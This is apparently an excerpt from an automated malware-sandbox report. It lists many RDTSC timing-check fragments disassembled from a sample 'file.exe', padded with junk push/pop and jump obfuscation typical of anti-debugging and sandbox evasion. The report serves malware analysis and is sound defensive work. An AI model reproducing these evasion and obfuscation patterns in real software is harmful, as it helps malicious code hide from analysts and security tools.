Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D0E8 second address: D6D11B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 je 00007F0C44EBA8E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0C44EBA8F3h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D11B second address: D6D12B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D12B second address: D6D134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D134 second address: D6D144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44DA3FEAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D144 second address: D6D15D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8EFh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D15D second address: D6D161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D161 second address: D6D165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D24958 second address: D08E1F instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44DA3FF3h 0x00000008 jmp 00007F0C44DA3FEDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F0C44DA3FE8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+12457114h], ecx 0x00000030 sub dword ptr [ebp+122D17F4h], esi 0x00000036 call dword ptr [ebp+122D1C86h] 0x0000003c jne 00007F0C44DA4015h 0x00000042 push ebx 0x00000043 jmp 00007F0C44DA3FECh 0x00000048 je 00007F0C44DA3FF2h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D24AB0 second address: D24AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F0C44EBA8E6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D24EF1 second address: D24EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D24EF5 second address: D24EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D24EF9 second address: B71989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, dword ptr [ebp+122D3652h] 0x00000010 jnl 00007F0C44DA3FF2h 0x00000016 push dword ptr [ebp+122D15BDh] 0x0000001c mov ecx, dword ptr [ebp+122D2D17h] 0x00000022 call dword ptr [ebp+122D19DAh] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D18EDh], edx 0x0000002f xor eax, eax 0x00000031 jmp 00007F0C44DA3FF9h 0x00000036 ja 00007F0C44DA3FE7h 0x0000003c cmc 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jns 00007F0C44DA3FECh 0x00000047 mov dword ptr [ebp+122D3676h], eax 0x0000004d mov dword ptr [ebp+122D18EDh], ecx 0x00000053 mov esi, 0000003Ch 0x00000058 mov dword ptr [ebp+122D18EDh], ebx 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 clc 0x00000063 lodsw 0x00000065 or dword ptr [ebp+122D2AFAh], esi 0x0000006b jc 00007F0C44DA3FE7h 0x00000071 stc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 or ecx, dword ptr [ebp+122D353Eh] 0x0000007d movzx ecx, dx 0x00000080 popad 0x00000081 jmp 00007F0C44DA3FF7h 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a stc 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e push edx 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25046 second address: D25057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F0C44EBA8E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25057 second address: D2505D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2505D second address: D25077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44EBA8F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D251E0 second address: D25210 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F0C44DA3FF5h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push edi 0x00000017 pushad 0x00000018 jp 00007F0C44DA3FE6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25464 second address: D25468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25B35 second address: D25B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25C0A second address: D25C56 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44EBA8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007F0C44EBA8F6h 0x00000010 mov di, 7657h 0x00000014 pop edx 0x00000015 lea eax, dword ptr [ebp+1248662Fh] 0x0000001b call 00007F0C44EBA8F3h 0x00000020 sub dl, 0000001Ah 0x00000023 pop edi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop edi 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25C56 second address: D25CD1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44DA3FECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0C44DA3FE8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+124865EBh] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F0C44DA3FE8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 mov edi, 733769A6h 0x0000004c push eax 0x0000004d pushad 0x0000004e pushad 0x0000004f jmp 00007F0C44DA3FF4h 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D473 second address: D6D47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D47B second address: D6D4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF1h 0x00000009 pop eax 0x0000000a jmp 00007F0C44DA3FEFh 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F0C44DA3FF9h 0x00000017 pushad 0x00000018 jmp 00007F0C44DA3FF8h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D62B second address: D6D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D62F second address: D6D64B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D64B second address: D6D669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8F9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D669 second address: D6D66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D66E second address: D6D674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D674 second address: D6D68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6D68E second address: D6D692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DD08 second address: D6DD0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DD0C second address: D6DD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0C44EBA8EEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DD1E second address: D6DD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FEDh 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F0C44DA3FE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DD39 second address: D6DD3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DEB1 second address: D6DECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F0C44DA3FE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0C44DA3FEFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DECF second address: D6DEE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44EBA8EBh 0x00000009 jnc 00007F0C44EBA8E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7120E second address: D71218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71218 second address: D71233 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44EBA8E6h 0x00000008 jmp 00007F0C44EBA8ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D739BA second address: D739DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF3h 0x00000007 jmp 00007F0C44DA3FEDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77EEF second address: D77F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F0C44EBA8E6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78051 second address: D78057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781B5 second address: D781D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0C44EBA8F7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781D8 second address: D781E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0C44DA3FE6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781E9 second address: D781ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781ED second address: D7820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44DA3FF5h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B056 second address: D7B060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0C44EBA8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B1BF second address: D7B1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B1C3 second address: D7B1E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0C44EBA8F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B349 second address: D7B34D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D820CE second address: D820E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0C44EBA8E6h 0x0000000a jmp 00007F0C44EBA8EBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D820E3 second address: D8210F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0C44DA3FEFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82271 second address: D82278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82278 second address: D82295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0C44DA3FF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8253C second address: D82545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2564D second address: D25674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF6h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c je 00007F0C44DA3FFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25674 second address: D25678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25678 second address: D256B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dl, 95h 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F0C44DA3FE8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b je 00007F0C44DA3FE8h 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D256B9 second address: D256D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44EBA8ECh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7CD7 second address: CE7CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7CDB second address: CE7CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F0C44EBA8E6h 0x0000000f jp 00007F0C44EBA8E6h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a popad 0x0000001b push esi 0x0000001c js 00007F0C44EBA8ECh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7CFF second address: CE7D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F0C44DA3FE6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B4E4 second address: D8B4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B4E8 second address: D8B4EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B62D second address: D8B63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8ECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B63D second address: D8B647 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44DA3FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C588 second address: D8C5B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44EBA8F6h 0x00000009 jmp 00007F0C44EBA8F2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C5B4 second address: D8C5C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F0C44DA3FE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CBBF second address: D8CBC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44EBA8EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CBC9 second address: D8CC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F0C44DA3FF9h 0x0000000c jnc 00007F0C44DA3FE6h 0x00000012 jmp 00007F0C44DA3FF7h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jmp 00007F0C44DA3FEBh 0x00000022 jbe 00007F0C44DA3FEEh 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914F9 second address: D914FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914FE second address: D91536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jmp 00007F0C44DA3FF7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jnp 00007F0C44DA3FE6h 0x00000017 jnl 00007F0C44DA3FE6h 0x0000001d popad 0x0000001e jc 00007F0C44DA3FE8h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91536 second address: D91551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F0C44EBA8E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91551 second address: D91555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90954 second address: D9095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90AD6 second address: D90ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90ADC second address: D90AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F0C44EBA8E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90AEA second address: D90AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C1A second address: D90C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F0C44EBA8F3h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0C44EBA8F0h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C4A second address: D90C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C4E second address: D90C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C52 second address: D90C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0C44DA3FFDh 0x0000000e popad 0x0000000f pushad 0x00000010 jo 00007F0C44DA3FEEh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C83 second address: D90C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007F0C44EBA8E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90F9E second address: D90FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 jmp 00007F0C44DA3FEFh 0x0000000c jg 00007F0C44DA3FE6h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F0C44DA3FF9h 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F0C44DA3FEBh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90FE6 second address: D90FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
